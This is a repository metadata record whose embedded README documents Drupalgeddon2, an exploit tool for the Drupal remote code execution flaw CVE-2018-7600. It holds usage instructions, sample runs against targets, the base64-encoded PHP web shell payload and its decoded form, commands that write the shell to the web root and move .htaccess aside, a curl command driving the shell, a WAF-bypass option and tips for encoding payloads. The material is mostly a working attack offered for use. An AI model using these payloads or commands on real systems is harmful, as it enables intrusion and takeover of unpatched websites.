{"id":13539254,"url":"https://github.com/dreadlocked/drupalgeddon2","last_synced_at":"2025-04-04T16:12:55.233Z","repository":{"id":41309050,"uuid":"129319611","full_name":"dreadlocked/Drupalgeddon2","owner":"dreadlocked","description":"Exploit for Drupal v7.x + v8.x (Drupalgeddon 2 / CVE-2018-7600 / SA-CORE-2018-002)","archived":false,"fork":false,"pushed_at":"2021-01-08T10:31:22.000Z","size":103,"stargazers_count":587,"open_issues_count":7,"forks_count":173,"subscribers_count":22,"default_branch":"master","last_synced_at":"2025-04-04T16:12:50.372Z","etag":null,"topics":["cve-2018-7600","drupal","drupal7","drupal8","drupalgeddon","drupalgeddon2","exploit","poc","sa-core-2018-002"],"latest_commit_sha":null,"homepage":"","language":"Ruby","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/dreadlocked.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2018-04-12T22:53:14.000Z","updated_at":"2025-02-02T02:04:34.000Z","dependencies_parsed_at":"2022-09-05T13:41:30.256Z","dependency_job_id":null,"html_url":"https://github.com/dreadlocked/Drupalgeddon2","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/dreadlocked%2FDrupalgeddon2/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/dreadlocked","download_url":"https://codeload.github.com/dreadlocked/Drupalgeddon2/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247208139,"owners_count":20901570,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve-2018-7600","drupal","drupal7","drupal8","drupalgeddon","drupalgeddon2","exploit","poc","sa-core-2018-002"],"created_at":"2024-08-01T09:01:22.473Z","updated_at":"2025-04-04T16:12:55.214Z","avatar_url":"https://github.com/dreadlocked.png","language":"Ruby","readme":"# CVE-2018-7600 | Drupal 8.5.x \u003c 8.5.1 / 8.4.x \u003c 8.4.6 / 8.x \u003c 8.3.9 / 7.x? \u003c 7.58 / \u003c 6.x? - 'Drupalgeddon2' RCE (SA-CORE-2018-002)\n\n[Drupalggedon2 ~ https://github.com/dreadlocked/Drupalgeddon2/](https://github.com/dreadlocked/Drupalgeddon2/) _([https://www.drupal.org/sa-core-2018-002](https://www.drupal.org/sa-core-2018-002))_\n\nSupports:\n- Drupal **\u003c 8.3.9** / **\u003c 8.4.6** / **\u003c 8.5.1** ~ `user/register` URL, attacking `account/mail` \u0026 `#post_render` parameter, using PHP's `passthru` function\n- Drupal **\u003c 7.58** ~ `user/password` URL, attacking `triggering_element_name` form \u0026 `#post_render` parameter, using PHP's `passthru` function\n- Works with **direct commands** (aka File-Less Method) or writes a **PHP shell** to the web root (`./`) or sub-directories (`./sites/default/` \u0026 `./sites/default/files/`)\n- Support **Linux** \u0026 **Windows** targets\n- **Auto detects Drupal version** _(or takes a good guess!)_\n\nThe `user/register` method was chosen for Drupal v8.x, as it will return `HTTP 200`, and render the output in the `data` JSON response _(un-comment the code for `timezone`/`#lazy_builder` method, which will return `HTTP 500` \u0026 blind!)_ _([More Information](https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708))_\n\nAuthors:\n- [Hans Topo](https://github.com/dreadlocked)  _([@\\_dreadlocked](https://twitter.com/_dreadlocked))_\n- [g0tmi1k](https://blog.g0tmi1k.com/) _([@g0tmi1k](https://twitter.com/g0tmi1k))_\n\nNotes:\n- For advance users/setups there is a more customizable exploit. See the `drupalgeddon2-customizable-beta.rb` section\n- Before opening an issue, please, read the troubleshooting section at the end. Thanks!\n\n\n- - -\n\n\n## Usage:\n\n```bash\n$ ruby drupalgeddon2.rb\nUsage: ruby drupalggedon2.rb \u003ctarget\u003e [--verbose] [--authentication]\n       ruby drupalgeddon2.rb https://example.com\n$\n```\nThe `--verbose` and `--authentication` parameter can be added in any order after \u003ctarget\u003e \nand they are both optional.\nIf `--authentication` is specified then you will be prompted with a request to submit\n* username, \n* password, \n* form field name for username, \n* form field name for password,\n* URL path to the web login page, e.g., `user/login`\n* eventual suffix to append after the credentials in the form submission, e.g., form_id, etc.\n\nThis is to support exploiting websites that first require POST-based web login and who \nrespond with a session cookie, upon successful authentication.\n\n\n### Drupal v8.x Example\n\n_Drupal v8.x \u003c v8.3.9 / v8.4.x \u003c v8.4.6 / v8.5.x \u003c v8.5.1_\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-8/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-8/\n--------------------------------------------------------------------------------\n[!] MISSING: http://localhost/drupal-8/CHANGELOG.txt    (HTTP Response: 404)\n[+] Found  : http://localhost/drupal-8/core/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal?: v8.x\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo TTTBJJBP\n[+] Result : TTTBJJBP\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\n--------------------------------------------------------------------------------\n[i] Fake shell:   curl 'http://localhost/drupal-8/s.php' -d 'c=hostname'\nubuntu140045x64-drupal\u003e\u003e uname -a\nLinux ubuntu140045x64-drupal 3.13.0-144-generic #193-Ubuntu SMP Thu Mar 15 17:03:53 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux\nubuntu140045x64-drupal\u003e\u003e\n```\n\n\n### Drupal v7.x Example\n\n_Drupal \u003c v7.58_\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-7/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-7/\n--------------------------------------------------------------------------------\n[+] Found  : http://localhost/drupal-7/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal!: v7.31\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo TKYPVVJJ\n[+] Result : TKYPVVJJ\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!!\n--------------------------------------------------------------------------------\n[i] Fake shell:   curl 'http://localhost/drupal-7/s.php' -d 'c=hostname'\n\nubuntu140045x64-drupal\u003e\u003e uptime\n 14:52:33 up 4 days,  3:35,  1 user,  load average: 0.00, 0.01, 0.05\nubuntu140045x64-drupal\u003e\u003e\n```\n\n\n#### Direct Commands / Non PHP Shell (aka File-Less Method)\n\nIf either you do not want to even try and write a PHP web shell to the web server, edit the file as shown _(it will fall back if it can't find a writeable location anyway)_:\n\n```ruby\ntry_phpshelltryphpshell = false\n```\n\n**Example**\n\n```bash\n$ ./drupalgeddon2.rb http://localhost/drupal-nonwrite/\n[*] --==[::#Drupalggedon2::]==--\n--------------------------------------------------------------------------------\n[i] Target : http://localhost/drupal-nonwrite/\n--------------------------------------------------------------------------------\n[!] MISSING: http://localhost/drupal-nonwrite/CHANGELOG.txt    (HTTP Response: 404)\n[+] Found  : http://localhost/drupal-nonwrite/core/CHANGELOG.txt    (HTTP Response: 200)\n[+] Drupal?: v8.x\n--------------------------------------------------------------------------------\n[*] Testing: Code Execution\n[i] Payload: echo HYCBAIET\n[+] Result : HYCBAIET\n[+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO!\n--------------------------------------------------------------------------------\n[*] Testing: Writing To Web Root (./)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [2] (HTTP Response: 404)...    Might not have write access?\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Writing To Web Root (sites/default/)\n[i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [2] (HTTP Response: 404)...    Might not have write access?\n- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -\n[*] Testing: Writing To Web Root (sites/default/files/)\n[*] Moving : ./sites/default/files/.htaccess\n[i] Payload: mv -f sites/default/files/.htaccess sites/default/files/.htaccess-bak; echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee sites/default/files/s.php\n[+] Result : \u003c?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2\u003e\u00261' ); }\n[!] Target is NOT exploitable for some reason [1] (HTTP Response: 403)...    May not be able to execute PHP from here?\n[!] FAILED: Couldn't find writeable web path\n--------------------------------------------------------------------------------\n[*] Dropping back to direct commands\ndrupalgeddon2\u003e\u003e lsb_release -a\nDistributor ID:\tUbuntu\nDescription:\tUbuntu 14.04.5 LTS\nRelease:\t14.04\nCodename:\ttrusty\ndrupalgeddon2\u003e\u003e\n```\n\n\n#### Proxy Support\n\nFor proxy support _(e.g. Burp)_, edit the file, replacing with your values. Example:\n\n```ruby\nproxy_addr = \"192.168.0.130\"\nproxy_port = 8080\n```\n\n\n- - -\n\n\n#### Experimental but usable: drupalgeddon2-customizable-beta.rb\n\n`drupalgeddon2-customizable-beta.rb` is intended for more advance users as its more customizable. It allows you to specify some more parameters as the PHP method to use (not only `system()` or `passthru()`) and the way to reach user/password form.\n\nUsage examples:\n\n```\nUsage example: ./drupalgeddon-customizable-beta.rb -u http://example.com/ -v 7 -c id\nMore info: -h\n    -u, --url URL                    [Required] Service URL\n    -v, --version VERSION            [Required] Target Drupal version {7,8}\n    -c, --command COMMAND            [Required] Command to execute\n    -m, --method PHP_METHOD          [Optional] PHP Method to use, by default: passthru\n        --form                       [Optional] Form to attack, by default '/user/password' in Drupal 7 and '/user/register' in Drupal 8\n        --cloudflare                 [Optional] Tries to bypass Cloudflare using Lua-Nginx +100 parameters WAF Bypass\n    -h, --help                       Prints this help\n```\n\n\n- - -\n\n\n## Troubleshooting:\n\n- Whenever getting a _cannot load such file_ \"LoadError\" type of error, do run `sudo gem install \u003cmissing dependency\u003e`.\nIn particular, you may need to install the _highline_ dependency with `sudo gem install highline`\n\n- The target may redirect to another path, where Drupal exists (such as `HTTP 30x` responses)\n    - Solution: Make sure you are using the correct Drupal path\n\n- There is a limitations of a allowed characters that are able to be used in the payload/command\n    - Solution: This is due to how the vulnerability sees them and them being encoded for the URL request. Encode the payload, decode it on the target. Such as base64\n\n- If the target is Linux, and isn't using \"GNU base64\", it may be the BSD version _(or its not installed all together!)_\n    - Solution: which to `base64 -D` (rather than `base64 -d`) or use the file-less method\n\n- If the target using Windows, writing the PHP shell always fails\n    - Solution: Use file-less method. This is because gets pipe to a unix program, rather than using `certutil` or `PowerShell`\n\n- Drupal v8.x - `./.htaccess` will stop any PHP scripts from executing in `./sites/default/` if that is the writeable folder\n    - Solution: Switch to the file-less method\n\n- Drupal v8.x - \"clean URL\" isn't enabled on the target\n    - Solution: N/A - Not vulnerable =(\n\n- Drupal v7.x - If the `/user/password` form is disabled, you meed find another form _(remember to change the exploit!)_\n    - Solution: `form_id` parameter will change depending on the form used to exploit the vulnerability\n\n\n- - -\n\n\n## Links:\n\n- Drupal SA-CORE-2018-002 Advisory ~ https://www.drupal.org/sa-core-2018-002\n- CVE ~ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600\n- Write up \u0026 Research ~ https://research.checkpoint.com/uncovering-drupalgeddon-2/\n- cURL commands/sample PoC ~ https://gist.github.com/g0tmi1k/7476eec3f32278adc07039c3e5473708\n","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"f799ff186643edfcf7ac1e94f08ba018\"\u003e\u003c/a\u003e知名漏洞\u0026\u0026CVE\u0026\u0026特定产品"],"project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fdreadlocked%2Fdrupalgeddon2/lists"}